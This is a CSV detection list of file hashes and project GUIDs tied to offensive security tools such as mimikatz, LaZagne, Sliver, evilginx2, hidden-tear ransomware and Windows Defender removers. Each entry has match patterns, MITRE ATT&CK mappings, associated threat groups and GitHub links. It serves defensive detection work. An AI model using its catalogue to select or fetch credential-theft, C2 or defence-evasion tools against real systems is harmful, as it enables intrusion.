"*3c4f49964a9cdf416005fa4a4cd54b5130cca78b0b810e5122ad0870f474fb49*",".{0,1000}3c4f49964a9cdf416005fa4a4cd54b5130cca78b0b810e5122ad0870f474fb49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25023"
"*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*",".{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","#filehash","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","25024"
"*3c59dc54401bcc15c44acc94ce543f7f3e40b164a12815892487aa137b1f4fc7*",".{0,1000}3c59dc54401bcc15c44acc94ce543f7f3e40b164a12815892487aa137b1f4fc7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25027"
"*3c5d50fa8f74bb4bf13e8b086490bc1d520b0a03b56e8d2b2f3ef65bbab2486a*",".{0,1000}3c5d50fa8f74bb4bf13e8b086490bc1d520b0a03b56e8d2b2f3ef65bbab2486a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25029"
"*3c5ecbc3edd1993243b38576c7b2a1ac16ba7b1ed5194f2cb8daf4a45fd51690*",".{0,1000}3c5ecbc3edd1993243b38576c7b2a1ac16ba7b1ed5194f2cb8daf4a45fd51690.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25030"
"*3C601672-7389-42B2-B5C9-059846E1DA88*",".{0,1000}3C601672\-7389\-42B2\-B5C9\-059846E1DA88.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","#GUIDproject","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","25031"
"*3c625eb5dbccce53faab97b9bfd0ef14f6c08730eae0d6442d201a64597c96ea*",".{0,1000}3c625eb5dbccce53faab97b9bfd0ef14f6c08730eae0d6442d201a64597c96ea.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","25032"
"*3c6843232a8479a389876f73cf69d7277ae2c7e635918699e183c062799dbd16*",".{0,1000}3c6843232a8479a389876f73cf69d7277ae2c7e635918699e183c062799dbd16.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25034"
"*3c6898fa2726b6487fcb12b854021b4e23f984e2bcdf5b5fe300c36cec2ad1a4*",".{0,1000}3c6898fa2726b6487fcb12b854021b4e23f984e2bcdf5b5fe300c36cec2ad1a4.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","25035"
"*3C8AA457-3659-4CDD-A685-66F7ED10DC4F*",".{0,1000}3C8AA457\-3659\-4CDD\-A685\-66F7ED10DC4F.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#GUIDproject","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","25042"
"*3c9f2deb4c664d6321474815f4fefa2c80778fe2da2a9a35d1a31f2f9106bf96*",".{0,1000}3c9f2deb4c664d6321474815f4fefa2c80778fe2da2a9a35d1a31f2f9106bf96.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25046"
"*3c9fdaf1fc583a55cb67fbbd267e295773495cfb3e18dd0b6dfe4db8e9d82a44*",".{0,1000}3c9fdaf1fc583a55cb67fbbd267e295773495cfb3e18dd0b6dfe4db8e9d82a44.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","25047"
"*3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3*",".{0,1000}3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25048"
"*3cb19c7a026a600cb480bcf0f799c9e050e7e3f6fbd9a0cd71658a408b81f787*",".{0,1000}3cb19c7a026a600cb480bcf0f799c9e050e7e3f6fbd9a0cd71658a408b81f787.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25049"
"*3cb401fdba1a0e74389ac9998005805f1d3e8ed70018d282f5885410d48725e1*",".{0,1000}3cb401fdba1a0e74389ac9998005805f1d3e8ed70018d282f5885410d48725e1.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","25050"
"*3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05*",".{0,1000}3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25053"
"*3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d*",".{0,1000}3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","25054"
"*3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2*",".{0,1000}3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25056"
"*3cd433ed1ca4566eade23d65399ebc7399e230fcdbde56deb29891e0213aefc1*",".{0,1000}3cd433ed1ca4566eade23d65399ebc7399e230fcdbde56deb29891e0213aefc1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25057"
"*3cda8f83a369ed200d702d90fad07f1d6ea719a876367ce0d7629b7ad2dfec05*",".{0,1000}3cda8f83a369ed200d702d90fad07f1d6ea719a876367ce0d7629b7ad2dfec05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25059"
"*3cdc3d8cd16161b7abedad3d2ed17ce49f03a5ab8b1bf6c09bffd6513f8ba4e0*",".{0,1000}3cdc3d8cd16161b7abedad3d2ed17ce49f03a5ab8b1bf6c09bffd6513f8ba4e0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25060"
"*3ce3579ba41d1ccab336da1f8768a257142c3f6eee0e8daac2605065e3a43234*",".{0,1000}3ce3579ba41d1ccab336da1f8768a257142c3f6eee0e8daac2605065e3a43234.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","25061"
"*3ce51c89b8367bae6cae0ff3fa4bbe420df215568e10af5f7b29b3e19048a2e8*",".{0,1000}3ce51c89b8367bae6cae0ff3fa4bbe420df215568e10af5f7b29b3e19048a2e8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25063"
"*3cef33596211f12ca62d6c531f5e6d31351616888eee9ddc4a315d49660adf56*",".{0,1000}3cef33596211f12ca62d6c531f5e6d31351616888eee9ddc4a315d49660adf56.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25065"
"*3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26*",".{0,1000}3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25066"
"*3CFB521D-40ED-4891-8B6C-ED0644A237C1*",".{0,1000}3CFB521D\-40ED\-4891\-8B6C\-ED0644A237C1.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","25067"
"*3cfff321b41acc3cdf87f4e112d201a3b2a4708dc370a97f7eaed419c258f206*",".{0,1000}3cfff321b41acc3cdf87f4e112d201a3b2a4708dc370a97f7eaed419c258f206.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25068"
"*3d00518d63ef9b656fdef85621d8a4f3137569ea71b07d431da6b39704f54dee*",".{0,1000}3d00518d63ef9b656fdef85621d8a4f3137569ea71b07d431da6b39704f54dee.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25069"
"*3d072fb48ae49e6cf6e94af84c2e6ba2c278a1189ac12b0e51b232462f3865d1*",".{0,1000}3d072fb48ae49e6cf6e94af84c2e6ba2c278a1189ac12b0e51b232462f3865d1.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25071"
"*3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064*",".{0,1000}3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","25072"
"*3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a*",".{0,1000}3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25073"
"*3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a*",".{0,1000}3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25074"
"*3D111394-E7F7-40B7-91CB-D24374DB739A*",".{0,1000}3D111394\-E7F7\-40B7\-91CB\-D24374DB739A.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#GUIDproject","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","25075"
"*3d136d26be0a8879daf18698d9b1e19a4c7a3ef095568a03d4b7a9e0f270034c*",".{0,1000}3d136d26be0a8879daf18698d9b1e19a4c7a3ef095568a03d4b7a9e0f270034c.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25077"
"*3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f*",".{0,1000}3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25078"
"*3d19ac0793c77c50db5f030000ca60dfbc95bd0bb7f90384ad03526c1ab5e902*",".{0,1000}3d19ac0793c77c50db5f030000ca60dfbc95bd0bb7f90384ad03526c1ab5e902.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25079"
"*3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5*",".{0,1000}3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25080"
"*3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4*",".{0,1000}3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25081"
"*3d2fcfc2a950657e9e5961d625ca07b8cf900cf4fffdc3e39ca9078bcf156f3d*",".{0,1000}3d2fcfc2a950657e9e5961d625ca07b8cf900cf4fffdc3e39ca9078bcf156f3d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25082"
"*3d3b65e7218d4308123058903295053c581d7f918ea6a7ddf61391d854febb36*",".{0,1000}3d3b65e7218d4308123058903295053c581d7f918ea6a7ddf61391d854febb36.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25083"
"*3d3f4263b35b7ef1bc8b9e9a70f9ef9b6b5625ee20bc5605d13607bcba64a5c2*",".{0,1000}3d3f4263b35b7ef1bc8b9e9a70f9ef9b6b5625ee20bc5605d13607bcba64a5c2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25085"
"*3d40e9cae263cedef7c3ae6b75a0d87deeb62288513355ff4a441d5e346d456d*",".{0,1000}3d40e9cae263cedef7c3ae6b75a0d87deeb62288513355ff4a441d5e346d456d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25086"
"*3d43ec6d4f223272bf31597619e5799de07eaba84fd4c5a57f8344010e0581a0*",".{0,1000}3d43ec6d4f223272bf31597619e5799de07eaba84fd4c5a57f8344010e0581a0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25087"
"*3d4861f420ef8bf0dd78fdc226a67be234217f607541a5ec2b0f0e6e15893235*",".{0,1000}3d4861f420ef8bf0dd78fdc226a67be234217f607541a5ec2b0f0e6e15893235.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25089"
"*3d505640278c986f4d6f644c64b28b338063003e54baa3826907c1c235a57c44*",".{0,1000}3d505640278c986f4d6f644c64b28b338063003e54baa3826907c1c235a57c44.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25091"
"*3d5c8b987186dc4ea84388408e0f0cc8b4026bb509e4ee4d8f8d090896ba1a7b*",".{0,1000}3d5c8b987186dc4ea84388408e0f0cc8b4026bb509e4ee4d8f8d090896ba1a7b.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25092"
